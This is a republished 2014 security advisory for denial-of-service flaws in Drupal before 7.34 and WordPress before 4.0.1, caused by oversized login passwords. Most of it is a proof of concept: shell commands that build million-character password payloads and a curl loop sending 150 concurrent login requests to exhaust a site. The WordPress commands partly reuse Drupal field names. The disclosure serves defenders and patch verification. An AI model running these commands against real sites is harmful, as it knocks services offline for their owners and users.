Lucene search
K

Drupal / WordPress Memory Exhaustion

🗓️ 01 Dec 2014 00:00:00Reported by Javer NietoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 59 Views

A vulnerability in Wordpress < 4.0.1 and Drupal < 7.34 leads to CPU and memory exhaustion, causing denial of service. Security updates and proof of concept actions are detailed

Related
Code
`====================================================================  
DESCRIPTION:  
====================================================================  
A vulnerability present in Wordpress < 4.0.1 and Drupal < 7.34 allows an  
attacker to send specially crafted requests resulting in CPU and memory  
exhaustion. This may lead to the site becoming unavailable or  
unresponsive (denial of service).  
  
====================================================================  
Time Line:  
====================================================================  
  
November 19, 2014 - A Drupal security update and the security advisory  
is published.  
  
November 20, 2014 - A Wordpress security update and the security  
advisory is published.  
  
====================================================================  
Proof of Concept:  
====================================================================  
  
  
Drupal Denial of Service CVE-2014-9016  
Generate a pyaload and try with a non-valid user:  
  
$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload  
  
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &  
  
Generate a pyaload and try with a valid user:  
  
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload  
  
$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &  
  
Perform a Dos with a valid user:  
  
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done  
Wordpress Denial of Service CVE-2014-9034  
Generate a pyaload and try with a non-valid user:  
  
$ echo -n "log=NO-VALID-USER&pwd=" > payload && printf "%s" {1..1000000} >> payload && echo -n "&wp-submit=Log In" >> payload  
  
$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &  
  
Generate a pyaload and try with a valid user:  
  
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload  
  
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &  
  
Perform a Dos with a valid user:  
  
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done  
  
  
====================================================================  
Authors:  
====================================================================  
  
-- Javer Nieto -- http://www.behindthefirewalls.com  
-- Andres Rojas -- http://www.devconsole.info  
  
====================================================================  
References:  
====================================================================  
  
* https://wordpress.org/news/2014/11/wordpress-4-0-1/  
  
* https://www.drupal.org/SA-CORE-2014-006  
  
*  
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html  
  
*  
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html  
  
* http://www.devconsole.info/?p=1050  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation